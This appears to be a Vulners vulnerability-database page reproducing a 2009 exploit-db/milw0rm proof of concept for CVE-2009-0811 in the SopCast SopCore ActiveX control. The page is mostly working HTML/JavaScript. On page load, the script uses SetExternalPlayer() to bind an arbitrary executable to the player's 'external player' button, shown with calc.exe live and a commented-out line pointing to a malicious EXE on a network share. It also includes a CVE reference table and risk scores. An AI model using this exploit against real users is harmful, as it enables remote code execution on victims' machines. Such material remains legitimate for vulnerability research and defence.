Sopcast SopCore Control - 'sopocx.ocx' Command Execution
🗓️ 03 Mar 2009 00:00:00Reported by Nine:Situations:GroupType
exploitdb🔗 www.exploit-db.com👁 87 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2009-0811 | 3 Mar 200900:00 | – | circl | |
| CVE-2009-0811 | 4 Mar 200917:00 | – | cve | |
| CVE-2009-0811 | 4 Mar 200917:00 | – | cvelist | |
| EUVD-2009-0809 | 7 Oct 202500:30 | – | euvd | |
| CVE-2009-0811 | 4 Mar 200917:30 | – | nvd | |
| SopCast SopCore ActiveX Control DoS Vulnerability - Windows | 12 Mar 200900:00 | – | openvas | |
| SopCast SopCore ActiveX Control DoS Vulnerability (Windows) | 12 Mar 200900:00 | – | openvas | |
| Design/Logic Flaw | 4 Mar 200917:30 | – | prion |
<!-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
user assisted remote code execution poc
by Nine:Situations:Group::surfista (IE7/8)
our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/
Through the SetExternalPlayer() method and the ExternalPlayer property
is possible to associate an arbitrary executable to the "external player"
button (for clearness see http://www.sopcast.com/docs/ where the player
control buttons are showed) which opens Windows Media Player by default.
When the user click this button, the executable is launched without prompts
Also this value is stored in config.xml, inside the sopcast local folder
for further use, ex. with the sopcast client application
Note: this control is safe for scripting and safe for initialization
-->
<HTML>
<HEAD>
<script language="Javascript" type="text/JavaScript">
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
</script>
</HEAD>
<BODY>
<OBJECT
ID="SopPlayer"
name="SopPlayer"
CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
HEIGHT=375
WIDTH=375>
</OBJECT>
</BODY>
</HTML>
# milw0rm.com [2009-03-03]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Mar 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.05537